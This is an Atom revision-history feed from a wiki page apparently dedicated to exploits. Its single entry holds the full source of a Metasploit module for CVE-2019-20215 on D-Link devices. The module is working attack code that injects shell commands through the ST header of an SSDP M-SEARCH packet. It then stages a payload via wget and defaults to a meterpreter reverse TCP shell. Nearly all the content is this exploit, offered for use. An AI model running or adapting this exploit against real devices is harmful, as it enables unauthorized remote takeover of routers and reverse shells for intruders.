<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-20215_D-Link_Devices%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-20215 D-Link Devices未經身份驗證遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-20215_D-Link_Devices%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-20215_D-Link_Devices%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T09:35:09Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-20215_D-Link_Devices%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1289&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==MSF EXP== &lt;pre&gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitMo...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-20215_D-Link_Devices%E6%9C%AA%E7%B6%93%E8%BA%AB%E4%BB%BD%E9%A9%97%E8%AD%89%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1289&amp;oldid=prev"/>
		<updated>2021-04-09T02:42:13Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==MSF EXP== &amp;lt;pre&amp;gt; ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##  class MetasploitMo...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==MSF EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
##&lt;br /&gt;
# This module requires Metasploit: https://metasploit.com/download&lt;br /&gt;
# Current source: https://github.com/rapid7/metasploit-framework&lt;br /&gt;
##&lt;br /&gt;
&lt;br /&gt;
class MetasploitModule &amp;lt; Msf::Exploit::Remote&lt;br /&gt;
  Rank = ExcellentRanking&lt;br /&gt;
&lt;br /&gt;
  include Msf::Exploit::Remote::Udp&lt;br /&gt;
  include Msf::Exploit::CmdStager&lt;br /&gt;
&lt;br /&gt;
  def initialize(info = {})&lt;br /&gt;
    super(update_info(info,&lt;br /&gt;
      'Name'        =&amp;gt; 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',&lt;br /&gt;
      'Description' =&amp;gt; %q{&lt;br /&gt;
        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.&lt;br /&gt;
      },&lt;br /&gt;
      'Author'      =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          's1kr10s',&lt;br /&gt;
          'secenv'&lt;br /&gt;
        ],&lt;br /&gt;
      'License'     =&amp;gt; MSF_LICENSE,&lt;br /&gt;
      'References'  =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          ['CVE', '2019-20215'],&lt;br /&gt;
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']&lt;br /&gt;
        ],&lt;br /&gt;
      'DisclosureDate' =&amp;gt; 'Dec 24 2019',&lt;br /&gt;
      'Privileged'     =&amp;gt; true,&lt;br /&gt;
      'Platform'       =&amp;gt; 'linux',&lt;br /&gt;
      'Arch'        =&amp;gt; ARCH_MIPSBE,&lt;br /&gt;
      'DefaultOptions' =&amp;gt;&lt;br /&gt;
        {&lt;br /&gt;
            'PAYLOAD' =&amp;gt; 'linux/mipsbe/meterpreter_reverse_tcp',&lt;br /&gt;
            'CMDSTAGER::FLAVOR' =&amp;gt; 'wget',&lt;br /&gt;
            'RPORT' =&amp;gt; '1900'&lt;br /&gt;
        },&lt;br /&gt;
      'Targets'        =&amp;gt;&lt;br /&gt;
        [&lt;br /&gt;
          [ 'Auto',	{ } ],&lt;br /&gt;
        ],&lt;br /&gt;
      'CmdStagerFlavor' =&amp;gt; %w{ echo wget },&lt;br /&gt;
      'DefaultTarget'  =&amp;gt; 0&lt;br /&gt;
      ))&lt;br /&gt;
&lt;br /&gt;
  register_options(&lt;br /&gt;
    [&lt;br /&gt;
      Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])&lt;br /&gt;
    ])&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def exploit&lt;br /&gt;
    execute_cmdstager(linemax: 1500)&lt;br /&gt;
  end&lt;br /&gt;
&lt;br /&gt;
  def execute_command(cmd, opts)&lt;br /&gt;
    type = datastore['VECTOR']&lt;br /&gt;
    if type == &amp;quot;URN&amp;quot;&lt;br /&gt;
      print_status(&amp;quot;Target Payload URN&amp;quot;)&lt;br /&gt;
      val = &amp;quot;urn:device:1;`#{cmd}`&amp;quot;&lt;br /&gt;
    else&lt;br /&gt;
      print_status(&amp;quot;Target Payload UUID&amp;quot;)&lt;br /&gt;
      val = &amp;quot;uuid:`#{cmd}`&amp;quot;&lt;br /&gt;
    end&lt;br /&gt;
&lt;br /&gt;
    connect_udp&lt;br /&gt;
    header = &amp;quot;M-SEARCH * HTTP/1.1\r\n&amp;quot;&lt;br /&gt;
    header &amp;lt;&amp;lt; &amp;quot;Host:239.255.255.250: &amp;quot; + datastore['RPORT'].to_s + &amp;quot;\r\n&amp;quot;&lt;br /&gt;
    header &amp;lt;&amp;lt; &amp;quot;ST:#{val}\r\n&amp;quot;&lt;br /&gt;
    header &amp;lt;&amp;lt; &amp;quot;Man:\&amp;quot;ssdp:discover\&amp;quot;\r\n&amp;quot;&lt;br /&gt;
    header &amp;lt;&amp;lt; &amp;quot;MX:2\r\n\r\n&amp;quot;&lt;br /&gt;
    udp_sock.put(header)&lt;br /&gt;
    disconnect_udp&lt;br /&gt;
  end&lt;br /&gt;
end&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>